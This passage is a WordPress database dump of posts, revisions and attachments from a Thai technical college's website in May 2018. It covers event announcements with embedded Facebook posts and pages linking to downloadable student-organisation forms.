(2758, 3, '2018-05-23 12:15:15', '2018-05-23 05:15:15', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584821838560675%26id%3D100010985913485&width=500\" width=\"500\" height=\"778\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เข้าร่วมประชุม เพื่อวางแผนพัฒนา \"วิชาชีพอาหารถิ่นจังหวัดระยอง\" ระหว่างปี 2561-2562 และร่วมหารือเกี่ยวกับการสร้างความร่วมมือในการดำเนินโครงการเชฟชุมชนเพื่อท่องเที่ยวไทยอย่างยั่งยืน ณ ห้องประชุมวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2756-revision-v1', '', '', '2018-05-23 12:15:15', '2018-05-23 05:15:15', '', 2756, 'http://www.technicrayong.ac.th/2756-revision-v1/', 0, 'revision', '', 0),
(2759, 3, '2018-05-23 12:15:24', '2018-05-23 05:15:24', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584821838560675%26id%3D100010985913485&width=500\" width=\"500\" height=\"778\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เข้าร่วมประชุม เพื่อวางแผนพัฒนา \"วิชาชีพอาหารถิ่นจังหวัดระยอง\" ระหว่างปี 2561-2562 และร่วมหารือเกี่ยวกับการสร้างความร่วมมือในการดำเนินโครงการเชฟชุมชนเพื่อท่องเที่ยวไทยอย่างยั่งยืน ณ ห้องประชุมวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2756-autosave-v1', '', '', '2018-05-23 12:15:24', '2018-05-23 05:15:24', '', 2756, 'http://www.technicrayong.ac.th/2756-autosave-v1/', 0, 'revision', '', 0),
(2760, 3, '2018-05-23 13:20:52', '2018-05-23 06:20:52', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D585215601854632%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เข้าร่วมต้อนรับ วิทยาลัยสารพัดช่างพระนครศรีอยุธยา เข้าศึกษาดูงานภายใต้โครงการสัมมนาเชิงปฏิบัติการและศึกษาดูงานการจัดการอาชีวศึกษาในเขตเศรษฐกิจพิเศษภาคตะวันออก (EEC) ณ อาคารศูนย์ประสานงาน(EEC) วิทยาลัยเทคนิคระยอง วันศุกร์ที่ 18 พฤษภาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%95%e0%b9%89%e0%b8%ad%e0%b8%99%e0%b8%a3%e0%b8%b1%e0%b8%9a-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1', '', '', '2018-05-23 13:20:52', '2018-05-23 06:20:52', '', 0, 'http://www.technicrayong.ac.th/?p=2760', 409, 'post', '', 0),
(2761, 3, '2018-05-23 13:20:38', '2018-05-23 06:20:38', '', '32750590_585209395188586_4327702411448680448_o', '', 'inherit', 'closed', 'closed', '', '32750590_585209395188586_4327702411448680448_o', '', '', '2018-05-23 13:20:38', '2018-05-23 06:20:38', '', 2760, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/32750590_585209395188586_4327702411448680448_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2762, 3, '2018-05-23 13:20:52', '2018-05-23 06:20:52', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D585215601854632%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เข้าร่วมต้อนรับ วิทยาลัยสารพัดช่างพระนครศรีอยุธยา เข้าศึกษาดูงานภายใต้โครงการสัมมนาเชิงปฏิบัติการและศึกษาดูงานการจัดการอาชีวศึกษาในเขตเศรษฐกิจพิเศษภาคตะวันออก (EEC) ณ อาคารศูนย์ประสานงาน(EEC) วิทยาลัยเทคนิคระยอง วันศุกร์ที่ 18 พฤษภาคม 2561', '', 'inherit', 'closed', 'closed', '', '2760-revision-v1', '', '', '2018-05-23 13:20:52', '2018-05-23 06:20:52', '', 2760, 'http://www.technicrayong.ac.th/2760-revision-v1/', 0, 'revision', '', 0),
(2763, 3, '2018-05-23 13:21:04', '2018-05-23 06:21:04', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D585215601854632%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เข้าร่วมต้อนรับ วิทยาลัยสารพัดช่างพระนครศรีอยุธยา เข้าศึกษาดูงานภายใต้โครงการสัมมนาเชิงปฏิบัติการและศึกษาดูงานการจัดการอาชีวศึกษาในเขตเศรษฐกิจพิเศษภาคตะวันออก (EEC) ณ อาคารศูนย์ประสานงาน(EEC) วิทยาลัยเทคนิคระยอง วันศุกร์ที่ 18 พฤษภาคม 2561', '', 'inherit', 'closed', 'closed', '', '2760-autosave-v1', '', '', '2018-05-23 13:21:04', '2018-05-23 06:21:04', '', 2760, 'http://www.technicrayong.ac.th/2760-autosave-v1/', 0, 'revision', '', 0),
(2764, 3, '2018-05-23 13:25:25', '2018-05-23 06:25:25', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.585225331853659%26type%3D3&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการตรวจสุขภาพนักเรียน นักศึกษา ประจำปีการศึกษา 2561 เพื่อคัดกรองโรคและสารเสพติดให้กับนักเรียน นักศึกษาให้ห่างไกลโรค ซึ่งเป็นหัวใจสำคัญของการขับเคลื่อนในอนาคตต่อไป ในวันศุกร์ที่ 18 พฤษภาคม 2561 ณ อาคาร 60 ปี โรงยิมวิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%95%e0%b8%a3%e0%b8%a7%e0%b8%88%e0%b8%aa%e0%b8%b8%e0%b8%82%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3', '', '', '2018-05-23 13:25:25', '2018-05-23 06:25:25', '', 0, 'http://www.technicrayong.ac.th/?p=2764', 408, 'post', '', 0),
(2765, 3, '2018-05-23 13:23:59', '2018-05-23 06:23:59', '', '32767681_585224541853738_332975371211243520_o', '', 'inherit', 'closed', 'closed', '', '32767681_585224541853738_332975371211243520_o', '', '', '2018-05-23 13:23:59', '2018-05-23 06:23:59', '', 2764, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/32767681_585224541853738_332975371211243520_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2766, 3, '2018-05-23 13:25:25', '2018-05-23 06:25:25', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.585225331853659%26type%3D3&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการตรวจสุขภาพนักเรียน นักศึกษา ประจำปีการศึกษา 2561 เพื่อคัดกรองโรคและสารเสพติดให้กับนักเรียน นักศึกษาให้ห่างไกลโรค ซึ่งเป็นหัวใจสำคัญของการขับเคลื่อนในอนาคตต่อไป ในวันศุกร์ที่ 18 พฤษภาคม 2561 ณ อาคาร 60 ปี โรงยิมวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2764-revision-v1', '', '', '2018-05-23 13:25:25', '2018-05-23 06:25:25', '', 2764, 'http://www.technicrayong.ac.th/2764-revision-v1/', 0, 'revision', '', 0),
(2768, 3, '2018-05-23 13:30:36', '2018-05-23 06:30:36', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Feec.rayong.7%2Fposts%2F244018783013703&width=500\" width=\"500\" height=\"797\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการอบรมระยะสั้นเพื่อเตรียมกำลังคนอาชีวะเข้าสู่ EEC ในหลักสูตร \"บาร์เทนเดอร์มืออาชีพ\" \"การปฏิบัติการธุรกิจขนส่งและโลจิสติกส์\" \"การพัฒนาแรงงานด้านยานยนต์ไฟฟ้า\" \"Advance Microsoft Excel\" ระหว่างวันที่ 16-20 พฤษภาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%b0%e0%b8%aa%e0%b8%b1%e0%b9%89%e0%b8%99%e0%b9%80%e0%b8%9e%e0%b8%b7', '', '', '2018-05-23 13:32:28', '2018-05-23 06:32:28', '', 0, 'http://www.technicrayong.ac.th/?p=2768', 407, 'post', '', 0),
(2769, 3, '2018-05-23 13:30:08', '2018-05-23 06:30:08', '', '33023017_244013203014261_6055043296172965888_o', '', 'inherit', 'closed', 'closed', '', '33023017_244013203014261_6055043296172965888_o', '', '', '2018-05-23 13:30:08', '2018-05-23 06:30:08', '', 2768, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/33023017_244013203014261_6055043296172965888_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2770, 3, '2018-05-23 13:30:36', '2018-05-23 06:30:36', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Feec.rayong.7%2Fposts%2F244018783013703&width=500\" width=\"500\" height=\"797\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการอบรมระยะสั้นเพื่อเตรียมกำลังคนอาชีวะเข้าสู่ EEC ในหลักสูตร \"บาร์เทนเดอร์มืออาชีพ\" \"การปฏิบัติการธุรกิจขนส่งและโลจิสติกส์\" \"การพัฒนาแรงงานด้านยานยนต์ไฟฟ้า\" \"Advance Microsoft Excel\" ระหว่างวันที่ 16-20 พฤษภาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2768-revision-v1', '', '', '2018-05-23 13:30:36', '2018-05-23 06:30:36', '', 2768, 'http://www.technicrayong.ac.th/2768-revision-v1/', 0, 'revision', '', 0),
(2771, 3, '2018-05-23 13:32:37', '2018-05-23 06:32:37', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Feec.rayong.7%2Fposts%2F244018783013703&width=500\" width=\"500\" height=\"797\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการอบรมระยะสั้นเพื่อเตรียมกำลังคนอาชีวะเข้าสู่ EEC ในหลักสูตร \"บาร์เทนเดอร์มืออาชีพ\" \"การปฏิบัติการธุรกิจขนส่งและโลจิสติกส์\" \"การพัฒนาแรงงานด้านยานยนต์ไฟฟ้า\" \"Advance Microsoft Excel\" ระหว่างวันที่ 16-20 พฤษภาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2768-autosave-v1', '', '', '2018-05-23 13:32:37', '2018-05-23 06:32:37', '', 2768, 'http://www.technicrayong.ac.th/2768-autosave-v1/', 0, 'revision', '', 0),
(2773, 3, '2018-05-28 09:39:09', '2018-05-28 02:39:09', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.585225331853659%26type%3D3&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการตรวจสุขภาพนักเรียน นักศึกษา ประจำปีการศึกษา 2561 เพื่อคัดกรองโรคและสารเสพติดให้กับนักเรียน นักศึกษาให้ห่างไกลโรค ซึ่งเป็นหัวใจสำคัญของการขับเคลื่อนในอนาคตต่อไป ในระหว่างวันที่ 18-24 พฤษภาคม 2561 ณ อาคาร 60 ปี โรงยิมวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2764-autosave-v1', '', '', '2018-05-28 09:39:09', '2018-05-28 02:39:09', '', 2764, 'http://www.technicrayong.ac.th/2764-autosave-v1/', 0, 'revision', '', 0),
(2775, 1, '2018-05-28 10:36:03', '2018-05-28 03:36:03', '', 'อวท.26', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-26', '', '', '2018-05-28 10:36:03', '2018-05-28 03:36:03', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.26.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2776, 1, '2018-05-28 10:36:14', '2018-05-28 03:36:14', '<h1><a href=\"/wp-content/uploads/2018/05/อวท.01.1.docx\">อวท.01</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.02.2.docx\">อวท.02</a> <a href=\"/wp-content/uploads/2018/05/อวท.02.3.docx\">อวท.02.1</a> <a href=\"/wp-content/uploads/2018/05/อวท.02.4.docx\">อวท.02.2</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.03docx.docx\">อวท.03</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.04.docx\">อวท.04</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.05.docx\">อวท.05</a> <a href=\"/wp-content/uploads/2018/05/อวท.05.1.docx\">อวท.05.1</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.06.docx\">อวท.06</a> <a href=\"/wp-content/uploads/2018/05/อวท.06.1.docx\">อวท.06.1</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.07.docx\">อวท.07</a> <a href=\"/wp-content/uploads/2018/05/อวท.07.1.docx\">อวท.07.1</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.08.docx\">อวท.08</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.09.docx\">อวท.09</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.10.docx\">อวท.10</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.11.docx\">อวท.11</a> <a href=\"/wp-content/uploads/2018/05/อวท.11.1.docx\">อวท.11.1</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.12.docx\">อวท.12</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.13.docx\">อวท.13</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.14.docx\">อวท.14</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.15.docx\">อวท.15</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.16.docx\">อวท.16</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.17.docx\">อวท.17</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.18.docx\">อวท.18</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.19.docx\">อวท.19</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.20.docx\">อวท.20</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.21.docx\">อวท.21</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.22.docx\">อวท.22</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.23.docx\">อวท.23</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.24.docx\">อวท.24</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.25.docx\">อวท.25</a> <a href=\"/wp-content/uploads/2018/05/อวท.25.1.docx\">อวท.25.1</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.26.docx\">อวท.26</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.27.docx\">อวท.27</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.28docx.docx\">อวท.28</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.29.docx\">อวท.29</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.30.docx\">อวท.30</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.31.docx\">อวท.31</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.32.docx\">อวท.32</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.33.docx\">อวท.33</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.34.docx\">อวท.34</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.35.docx\">อวท.35</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.36.docx\">อวท.36</a></h1>', 'แบบ อวท. 1-36', '', 'inherit', 'closed', 'closed', '', '2661-revision-v1', '', '', '2018-05-28 10:36:14', '2018-05-28 03:36:14', '', 2661, 'http://www.technicrayong.ac.th/2661-revision-v1/', 0, 'revision', '', 0),
(2777, 1, '2018-05-28 10:37:08', '2018-05-28 03:37:08', '<h1><a href=\"/wp-content/uploads/2018/05/อวท.01.1.docx\">อวท.01</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.02.2.docx\">อวท.02</a> <a href=\"/wp-content/uploads/2018/05/อวท.02.3.docx\">อวท.02.1</a> <a href=\"/wp-content/uploads/2018/05/อวท.02.4.docx\">อวท.02.2</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.03docx.docx\">อวท.03</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.04.docx\">อวท.04</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.05.docx\">อวท.05</a> <a href=\"/wp-content/uploads/2018/05/อวท.05.1.docx\">อวท.05.1</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.06.docx\">อวท.06</a> <a href=\"/wp-content/uploads/2018/05/อวท.06.1.docx\">อวท.06.1</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.07.docx\">อวท.07</a> <a href=\"/wp-content/uploads/2018/05/อวท.07.1.docx\">อวท.07.1</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.08.docx\">อวท.08</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.09.docx\">อวท.09</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.10.docx\">อวท.10</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.11.docx\">อวท.11</a> <a href=\"/wp-content/uploads/2018/05/อวท.11.1.docx\">อวท.11.1</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.12.docx\">อวท.12</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.13.docx\">อวท.13</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.14.docx\">อวท.14</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.15.docx\">อวท.15</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.16.docx\">อวท.16</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.17.docx\">อวท.17</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.18.docx\">อวท.18</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.19.docx\">อวท.19</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.20.docx\">อวท.20</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.21.docx\">อวท.21</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.22.docx\">อวท.22</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.23.docx\">อวท.23</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.24.docx\">อวท.24</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.25.docx\">อวท.25</a> <a href=\"/wp-content/uploads/2018/05/อวท.25.1.docx\">อวท.25.1</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.26.docx\">อวท.26</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.27.docx\">อวท.27</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.28docx.docx\">อวท.28</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.29.docx\">อวท.29</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.30.docx\">อวท.30</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.31.docx\">อวท.31</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.32.docx\">อวท.32</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.33.docx\">อวท.33</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.34.docx\">อวท.34</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.35.docx\">อวท.35</a></h1>\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.36.docx\">อวท.36</a></h1>', 'แบบ อวท. 1-36', '', 'inherit', 'closed', 'closed', '', '2661-autosave-v1', '', '', '2018-05-28 10:37:08', '2018-05-28 03:37:08', '', 2661, 'http://www.technicrayong.ac.th/2661-autosave-v1/', 0, 'revision', '', 0),
(2778, 1, '2018-05-28 10:40:39', '2018-05-28 03:40:39', '<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/แบบประเมิน-การพัฒนาสมาชิกให้เป็นคนดี-คนเก่ง-และมีความสุข.docx\">แบบประเมิน การพัฒนาสมาชิกให้เป็นคนดี คนเก่ง และมีความสุข</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/แบบฟอร์มการเขียนโครงการและการจัดทำรูปเล่ม.doc\">แบบฟอร์มการเขียนโครงการและการจัดทำรูปเล่ม</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/การจัดทำรูปเล่มโครงการ.docx\">แบบฟอร์ม การจัดทำรูปเล่มโครงการ</a></span></h3>', 'แบบฟอร์มอื่นๆ ของงานองค์การนักวิชาชีพฯ', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%9f%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%a1%e0%b8%ad%e0%b8%b7%e0%b9%88%e0%b8%99%e0%b9%86-%e0%b8%82%e0%b8%ad%e0%b8%87%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%ad%e0%b8%87%e0%b8%84', '', '', '2018-05-28 10:40:39', '2018-05-28 03:40:39', '', 0, 'http://www.technicrayong.ac.th/?page_id=2778', 0, 'page', '', 0),
(2779, 1, '2018-05-28 10:39:44', '2018-05-28 03:39:44', '', 'แบบประเมิน การพัฒนาสมาชิกให้เป็นคนดี คนเก่ง และมีความสุข', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%aa%e0%b8%a1%e0%b8%b2%e0%b8%8a', '', '', '2018-05-28 10:39:44', '2018-05-28 03:39:44', '', 2778, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/แบบประเมิน-การพัฒนาสมาชิกให้เป็นคนดี-คนเก่ง-และมีความสุข.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2780, 1, '2018-05-28 10:39:48', '2018-05-28 03:39:48', '', 'แบบฟอร์มการเขียนโครงการและการจัดทำรูปเล่ม', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%9f%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%82%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2', '', '', '2018-05-28 10:39:48', '2018-05-28 03:39:48', '', 2778, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/แบบฟอร์มการเขียนโครงการและการจัดทำรูปเล่ม.doc', 0, 'attachment', 'application/msword', 0),
(2781, 1, '2018-05-28 10:39:52', '2018-05-28 03:39:52', '', 'การจัดทำรูปเล่มโครงการ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%97%e0%b8%b3%e0%b8%a3%e0%b8%b9%e0%b8%9b%e0%b9%80%e0%b8%a5%e0%b9%88%e0%b8%a1%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-28 10:39:52', '2018-05-28 03:39:52', '', 2778, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/การจัดทำรูปเล่มโครงการ.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2782, 1, '2018-05-28 10:40:39', '2018-05-28 03:40:39', '<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/แบบประเมิน-การพัฒนาสมาชิกให้เป็นคนดี-คนเก่ง-และมีความสุข.docx\">แบบประเมิน การพัฒนาสมาชิกให้เป็นคนดี คนเก่ง และมีความสุข</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/แบบฟอร์มการเขียนโครงการและการจัดทำรูปเล่ม.doc\">แบบฟอร์มการเขียนโครงการและการจัดทำรูปเล่ม</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/การจัดทำรูปเล่มโครงการ.docx\">แบบฟอร์ม การจัดทำรูปเล่มโครงการ</a></span></h3>', 'แบบฟอร์มอื่นๆ ของงานองค์การนักวิชาชีพฯ', '', 'inherit', 'closed', 'closed', '', '2778-revision-v1', '', '', '2018-05-28 10:40:39', '2018-05-28 03:40:39', '', 2778, 'http://www.technicrayong.ac.th/2778-revision-v1/', 0, 'revision', '', 0),
(2783, 1, '2018-05-28 10:40:49', '2018-05-28 03:40:49', '<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/แบบประเมิน-การพัฒนาสมาชิกให้เป็นคนดี-คนเก่ง-และมีความสุข.docx\">แบบประเมิน การพัฒนาสมาชิกให้เป็นคนดี คนเก่ง และมีความสุข</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/แบบฟอร์มการเขียนโครงการและการจัดทำรูปเล่ม.doc\">แบบฟอร์มการเขียนโครงการและการจัดทำรูปเล่ม</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/การจัดทำรูปเล่มโครงการ.docx\">แบบฟอร์ม การจัดทำรูปเล่มโครงการ</a></span></h3>', 'แบบฟอร์มอื่นๆ ของงานองค์การนักวิชาชีพฯ', '', 'inherit', 'closed', 'closed', '', '2778-autosave-v1', '', '', '2018-05-28 10:40:49', '2018-05-28 03:40:49', '', 2778, 'http://www.technicrayong.ac.th/2778-autosave-v1/', 0, 'revision', '', 0),
